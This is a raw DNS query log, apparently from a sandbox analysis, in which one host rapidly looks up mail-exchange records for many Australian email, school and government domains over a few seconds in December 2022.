                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:20.225272894 CET192.168.2.38.8.8.80x7f03Standard query (0)extmail.bigpond.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:20.229013920 CET192.168.2.38.8.8.80xe1b1Standard query (0)mta6.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:20.240289927 CET192.168.2.38.8.8.80x758aStandard query (0)student.nd.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:20.362062931 CET192.168.2.38.8.8.80x9287Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:20.375706911 CET192.168.2.38.8.8.80x15bcStandard query (0)tang.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:20.447691917 CET192.168.2.38.8.8.80xe876Standard query (0)mta6.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:20.461108923 CET192.168.2.38.8.8.80x8068Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:20.566206932 CET192.168.2.38.8.8.80x411cStandard query (0)mta7.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:20.566896915 CET192.168.2.38.8.8.80x7150Standard query (0)cis.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:20.677684069 CET192.168.2.38.8.8.80x71efStandard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:20.709706068 CET192.168.2.38.8.8.80x54d6Standard query (0)workskil.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:20.717844009 CET192.168.2.38.8.8.80xe341Standard query (0)mta6.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:20.770345926 CET192.168.2.38.8.8.80xf75Standard query (0)tang.in.tmes-anz.trendmicro.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:20.773515940 CET192.168.2.38.8.8.80x6891Standard query (0)frmpexc03.nd.edu.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:20.776263952 CET192.168.2.38.8.8.80x413cStandard query (0)au-smtp-inbound-2.mimecast.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:20.796499014 CET192.168.2.38.8.8.80xab4dStandard query (0)salmat.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:20.918602943 CET192.168.2.38.8.8.80x69f2Standard query (0)aspmx.l.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:20.926634073 CET192.168.2.38.8.8.80xe1dcStandard query (0)spin.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:20.928407907 CET192.168.2.38.8.8.80xd70bStandard query (0)wopr.ci.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:20.945358038 CET192.168.2.38.8.8.80x9d5bStandard query (0)dodo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:21.029915094 CET192.168.2.38.8.8.80x7425Standard query (0)mx-ctdodo.gtm.oss-core.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:21.031094074 CET192.168.2.38.8.8.80x39ebStandard query (0)rwwa.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:21.056500912 CET192.168.2.38.8.8.80xc08aStandard query (0)rwwa-mx1.firstwave.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:21.215111971 CET192.168.2.38.8.8.80x8408Standard query (0)beaconhills.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:21.217658997 CET192.168.2.38.8.8.80x2574Standard query (0)tpg.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:21.245914936 CET192.168.2.38.8.8.80x5675Standard query (0)asav.tpg.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:21.307599068 CET192.168.2.38.8.8.80x9381Standard query (0)people.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:21.464114904 CET192.168.2.38.8.8.80xfc4dStandard query (0)mx3.spintel.net.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:21.533354044 CET192.168.2.38.8.8.80x3260Standard query (0)ipt-mailgate-01.m2core.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:21.534240961 CET192.168.2.38.8.8.80xada2Standard query (0)spin.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:21.641700983 CET192.168.2.38.8.8.80x8fc1Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:21.653707027 CET192.168.2.38.8.8.80xaf47Standard query (0)mx1.spintel.net.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:21.658381939 CET192.168.2.38.8.8.80xc77Standard query (0)rainbowinn.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:21.699199915 CET192.168.2.38.8.8.80xf122Standard query (0)mta6.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:21.764144897 CET192.168.2.38.8.8.80xeb71Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:21.811908007 CET192.168.2.38.8.8.80x7e21Standard query (0)mta5.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:21.843400002 CET192.168.2.38.8.8.80x7a38Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:21.869914055 CET192.168.2.38.8.8.80xe4eaStandard query (0)mx1.nameserver.net.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:21.870157003 CET192.168.2.38.8.8.80xbd6dStandard query (0)mta7.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:22.039053917 CET192.168.2.38.8.8.80xde05Standard query (0)cit.act.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:22.060148001 CET192.168.2.38.8.8.80xa6e8Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:22.083786011 CET192.168.2.38.8.8.80x1068Standard query (0)mta5.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:22.120695114 CET192.168.2.38.8.8.80x1f53Standard query (0)stprsuns.melb.catholic.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:22.231184006 CET192.168.2.38.8.8.80xe8d5Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:22.259238005 CET192.168.2.38.8.8.80xa859Standard query (0)mta7.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:22.269951105 CET192.168.2.38.8.8.80xa987Standard query (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:22.292572975 CET192.168.2.38.8.8.80xbccdStandard query (0)extmail.optusnet.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:22.391716957 CET192.168.2.38.8.8.80x48ccStandard query (0)capitalchemist.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:22.439054966 CET192.168.2.38.8.8.80x20cStandard query (0)cit-act-edu-au.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:22.499689102 CET192.168.2.38.8.8.80x5dd9Standard query (0)banksgroup.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:22.518810034 CET192.168.2.38.8.8.80xca8Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:22.541831017 CET192.168.2.38.8.8.80x252dStandard query (0)mta6.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:22.727190018 CET192.168.2.38.8.8.80x167eStandard query (0)banksgroup-com-au.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:22.910922050 CET192.168.2.38.8.8.80xd967Standard query (0)thelastfrontier.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:22.940926075 CET192.168.2.38.8.8.80x44ccStandard query (0)capitalchemist-com-au.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:22.941852093 CET192.168.2.38.8.8.80xfac5Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:22.942744017 CET192.168.2.38.8.8.80xf093Standard query (0)amf.org.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:22.960851908 CET192.168.2.38.8.8.80xaafbStandard query (0)g.austincc.eduMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:22.965317965 CET192.168.2.38.8.8.80x2b0dStandard query (0)mta5.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:22.990820885 CET192.168.2.38.8.8.80xabc1Standard query (0)ASPMX.L.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:23.085767031 CET192.168.2.38.8.8.80x90c5Standard query (0)amf-org-au.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:23.086420059 CET192.168.2.38.8.8.80x38c3Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:23.109936953 CET192.168.2.38.8.8.80x7714Standard query (0)mta6.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:23.130673885 CET192.168.2.38.8.8.80x13d1Standard query (0)mail.thelastfrontier.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:23.287605047 CET192.168.2.38.8.8.80xe4a8Standard query (0)hotkey.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:23.324084044 CET192.168.2.38.8.8.80xa8bcStandard query (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:23.325018883 CET192.168.2.38.8.8.80xf3afStandard query (0)hardingmedia.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:23.354434967 CET192.168.2.38.8.8.80x9dfcStandard query (0)extmail.optusnet.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:23.448745966 CET192.168.2.38.8.8.80x7eb2Standard query (0)swiftdsl.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:23.471749067 CET192.168.2.38.8.8.80x1db8Standard query (0)ipt-mailgate-01.m2core.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:23.551811934 CET192.168.2.38.8.8.80x3db7Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:23.575102091 CET192.168.2.38.8.8.80x30e3Standard query (0)mta6.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:23.640562057 CET192.168.2.38.8.8.80xe1baStandard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:23.677077055 CET192.168.2.38.8.8.80xe6e9Standard query (0)mx.syd.iprimus.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:23.678317070 CET192.168.2.38.8.8.80x2120Standard query (0)mta7.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:23.687644005 CET192.168.2.38.8.8.80xb68aStandard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:23.851504087 CET192.168.2.38.8.8.80xe711Standard query (0)mta6.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:23.904685020 CET192.168.2.38.8.8.80x11a2Standard query (0)brookesfamily.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:23.964059114 CET192.168.2.38.8.8.80x95b2Standard query (0)up2date.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:23.971031904 CET192.168.2.38.8.8.80xd0eaStandard query (0)hardingmedia.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:24.016161919 CET192.168.2.38.8.8.80xf411Standard query (0)exemail.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:24.135365963 CET192.168.2.38.8.8.80xe042Standard query (0)ozemail.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:24.137454033 CET192.168.2.38.8.8.80x9f91Standard query (0)mx01.mail.icloud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:24.202505112 CET192.168.2.38.8.8.80xdbb8Standard query (0)asav.iinet.net.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:24.235256910 CET192.168.2.38.8.8.80x9c31Standard query (0)echowebhosting.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:24.252975941 CET192.168.2.38.8.8.80x1ee8Standard query (0)up2date-com-au.p20.mxthunder.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:24.335503101 CET192.168.2.38.8.8.80x293cStandard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:24.338490963 CET192.168.2.38.8.8.80x8521Standard query (0)lastmx.spamexperts.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:24.463280916 CET192.168.2.38.8.8.80xd58fStandard query (0)mta7.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:24.499111891 CET192.168.2.38.8.8.80x749dStandard query (0)activ8.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:24.501048088 CET192.168.2.38.8.8.80x5271Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:24.524358988 CET192.168.2.38.8.8.80x91c6Standard query (0)mta6.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:24.531677961 CET192.168.2.38.8.8.80x3fd9Standard query (0)mx01.activ8.net.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:24.583940029 CET192.168.2.38.8.8.80x6993Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:24.613104105 CET192.168.2.38.8.8.80xceccStandard query (0)mta5.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:24.619935989 CET192.168.2.38.8.8.80x49a6Standard query (0)iprimus.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:24.685442924 CET192.168.2.38.8.8.80x39b6Standard query (0)mx.syd.iprimus.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:24.726803064 CET192.168.2.38.8.8.80x66d9Standard query (0)marketlinkaustralia.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:24.803649902 CET192.168.2.38.8.8.80x6725Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:24.828505993 CET192.168.2.38.8.8.80xc265Standard query (0)mta5.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:25.053055048 CET192.168.2.38.8.8.80x6bc2Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:25.102586985 CET192.168.2.38.8.8.80x4e68Standard query (0)mta7.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:25.103419065 CET192.168.2.38.8.8.80xc608Standard query (0)academyroofing.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:25.138622046 CET192.168.2.38.8.8.80xf0a6Standard query (0)bigpond.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:25.243774891 CET192.168.2.38.8.8.80x1888Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:25.267484903 CET192.168.2.38.8.8.80x1849Standard query (0)mta6.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:25.328210115 CET192.168.2.38.8.8.80x434eStandard query (0)iinet.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:25.352013111 CET192.168.2.38.8.8.80x8bf3Standard query (0)asav.iinet.net.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:25.416809082 CET192.168.2.38.8.8.80xec74Standard query (0)msn.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:25.443696022 CET192.168.2.38.8.8.80xbb79Standard query (0)extmail.bpbb.bigpond.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:25.446146965 CET192.168.2.38.8.8.80x5e44Standard query (0)hosted-inbound.iinet.net.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:25.797636032 CET192.168.2.38.8.8.80xe2b0Standard query (0)iinet.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:25.831820011 CET192.168.2.38.8.8.80x711eStandard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:25.842798948 CET192.168.2.38.8.8.80x5cd3Standard query (0)asav2.iinet.net.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:25.855590105 CET192.168.2.38.8.8.80xf22bStandard query (0)mta7.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:25.877810955 CET192.168.2.38.8.8.80xd568Standard query (0)mta7.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:25.901130915 CET192.168.2.38.8.8.80xe83cStandard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:25.927237988 CET192.168.2.38.8.8.80xc5ccStandard query (0)mta5.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:26.098581076 CET192.168.2.38.8.8.80xbfbaStandard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:26.126805067 CET192.168.2.38.8.8.80x4f93Standard query (0)ivanhoegirls.vic.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:26.127692938 CET192.168.2.38.8.8.80x72c5Standard query (0)mta5.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:26.216976881 CET192.168.2.38.8.8.80x2b1bStandard query (0)ivanhoegirls-vic-edu-au.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:26.219861984 CET192.168.2.38.8.8.80x3c52Standard query (0)ichr.uwa.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:26.297100067 CET192.168.2.38.8.8.80xc1d7Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:26.327085018 CET192.168.2.38.8.8.80x70dcStandard query (0)mta6.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:26.392075062 CET192.168.2.38.8.8.80x6a1fStandard query (0)senet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:26.443964005 CET192.168.2.38.8.8.80xd152Standard query (0)primusonline.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:26.461683035 CET192.168.2.38.8.8.80xec74Standard query (0)msn.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:26.550631046 CET192.168.2.38.8.8.80xe94bStandard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:26.577696085 CET192.168.2.38.8.8.80xcf96Standard query (0)mta6.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:26.582401991 CET192.168.2.38.8.8.80xfa62Standard query (0)extmail.msn.bigpond.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:26.667762041 CET192.168.2.38.8.8.80x76aeStandard query (0)oft.commerce.nsw.gov.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:26.737524986 CET192.168.2.38.8.8.80x6f28Standard query (0)bigpond.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:26.741391897 CET192.168.2.38.8.8.80x9624Standard query (0)docparmail01.fairtrading.nsw.gov.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:26.744276047 CET192.168.2.38.8.8.80xb02eStandard query (0)asav.iinet.net.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:26.757770061 CET192.168.2.38.8.8.80xe5c3Standard query (0)extmail.bigpond.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:26.851468086 CET192.168.2.38.8.8.80x9cc2Standard query (0)mx.syd.iprimus.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:26.856914043 CET192.168.2.38.8.8.80xc463Standard query (0)symbolix.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:26.857855082 CET192.168.2.38.8.8.80x2ce5Standard query (0)telethonkids.in.tmes-anz.trendmicro.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:26.866436005 CET192.168.2.38.8.8.80x8429Standard query (0)tafensw.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:26.888850927 CET192.168.2.38.8.8.80x35b9Standard query (0)tafensw-net-au.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:26.993396044 CET192.168.2.38.8.8.80xf812Standard query (0)slmcorporate.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:27.022006035 CET192.168.2.38.8.8.80x51e3Standard query (0)slmcorporate-com-au.p10.spamhero.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:27.023591042 CET192.168.2.38.8.8.80x513fStandard query (0)keypoint.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:27.128617048 CET192.168.2.38.8.8.80x1d09Standard query (0)alt2.aspmx.l.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:27.128617048 CET192.168.2.38.8.8.80x234Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:27.255985975 CET192.168.2.38.8.8.80xd95aStandard query (0)mta7.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:27.349545956 CET192.168.2.38.8.8.80x7d03Standard query (0)ab.auone-net.jpMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:27.361700058 CET192.168.2.38.8.8.80xa2e9Standard query (0)cap.tas.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:27.436927080 CET192.168.2.38.8.8.80x47adStandard query (0)mx01.auone-net.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:27.437671900 CET192.168.2.38.8.8.80x8b94Standard query (0)mx1.eftel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:27.452260971 CET192.168.2.38.8.8.80xc348Standard query (0)chubb.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:27.547388077 CET192.168.2.38.8.8.80x4d47Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:27.568105936 CET192.168.2.38.8.8.80x6fceStandard query (0)mta7.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:27.570487022 CET192.168.2.38.8.8.80x3117Standard query (0)chubb-com-au.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:27.686970949 CET192.168.2.38.8.8.80x9aefStandard query (0)vu.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:27.730580091 CET192.168.2.38.8.8.80x6751Standard query (0)bigpond.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:27.750824928 CET192.168.2.38.8.8.80x4cbaStandard query (0)extmail.bpbb.bigpond.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:27.795794010 CET192.168.2.38.8.8.80xef34Standard query (0)bigpond.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:27.910875082 CET192.168.2.38.8.8.80x9b9bStandard query (0)hornsby.nsw.gov.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:27.953094959 CET192.168.2.38.8.8.80xd075Standard query (0)act.gov.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.001384020 CET192.168.2.38.8.8.80xc3a9Standard query (0)mx2.hc676-53.ap.iphmx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.058223009 CET192.168.2.38.8.8.80x63bcStandard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.150352001 CET192.168.2.38.8.8.80xd1cfStandard query (0)hornsby-nsw-gov-au.mail.protection.outlook.comA (IP address)IN (0x0001)false
